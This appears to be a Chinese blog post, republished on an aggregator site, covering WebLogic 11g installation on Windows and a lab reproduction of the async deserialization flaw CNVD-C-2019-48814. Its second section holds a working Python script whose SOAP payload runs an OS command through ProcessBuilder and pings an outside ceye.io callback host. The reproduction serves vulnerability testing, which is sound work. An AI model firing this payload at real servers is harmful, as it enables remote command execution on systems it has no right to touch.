Weblogic记录

Posted 2021-10-28 nobgr

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了Weblogic记录相关的知识，希望对你有一定的参考价值。

有些坑还是要去踩，上来就docker一脸懵逼。

1、应用

https://www.cnblogs.com/xdp-gacl/p/4140683.html

（1）安装

环境：

64位server2016
jdk1.7
wls1036_generic.jar（11g）

下载好jar，之后执行 java -D64 -jar wls1036_generic.jar

技术图片

下一步

技术图片

ps：之后出现的邮件和代理请忽略

技术图片

典型安装类型，下一步

技术图片

找到本地jdk的安装路径，下一步

技术图片

安装路径，下一步。安装概要，下一步，之后就会安装。

技术图片

安装完成

技术图片

（2）Quickstart配置

开始吧

技术图片

新建域，下一步

技术图片

域源不管，直接下一步。设置域名，域位置，这里默认，也不管。设置管理员用户名和密码，下一步。

技术图片

选择模式和jdk，这里选择生产模式

技术图片

可选配置先选管理服务器（中间件负载那些目前本菜鸡还没摸到，先不管），下一步

技术图片

设置监听地址和端口和ssl，下一步
技术图片

路径（如果改了路径，请找下）：C:\\Oracle\\Middleware\\user_projects\\domains\\base_domain下有个启动脚本bat，直接双击，之后输入账号密码。

或者找到快捷方式启动Start Admin Server for Weblogic Server Domain，之后输入账号密码。

之后访问http://ip:port/console，看见控制台即可。部署war

技术图片

参考：https://www.cnblogs.com/xiaozi/p/9214345.html

2、漏洞复现

（1）CNVD-C-2019-48814

#coding:utf-8
import requests

#平台不同，路径不同问题。

url="http://192.168.152.131:7001"
path='/_async/AsyncResponseService'
header={'content-type':'text/xml'}

#假设机器通外网
payload1='''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping 236136123.xxxx.ceye.io</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''

try:
    rep=requests.get(url+path,timeout=3)
    if rep.status_code==200:
        r=requests.post(url+path,headers=header,data=payload1,timeout=3)
        if r.status_code==202:
            print url,"----","可能存在wls9-async组件反序列化漏洞"

except Exception as e:
    print "error"
    
    
#参考
#https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961
#https://www.t00ls.net/thread-50968-1-1.html

以上是关于Weblogic记录的主要内容，如果未能解决你的问题，请参考以下文章

CSP核心代码片段记录

weblogic安装错误记录

weblogic-重点知识记录-持续更新

Linux环境下weblogic12开启远程debug端口

weblogic打补丁的操作步骤与记录

记录C#常用的代码片段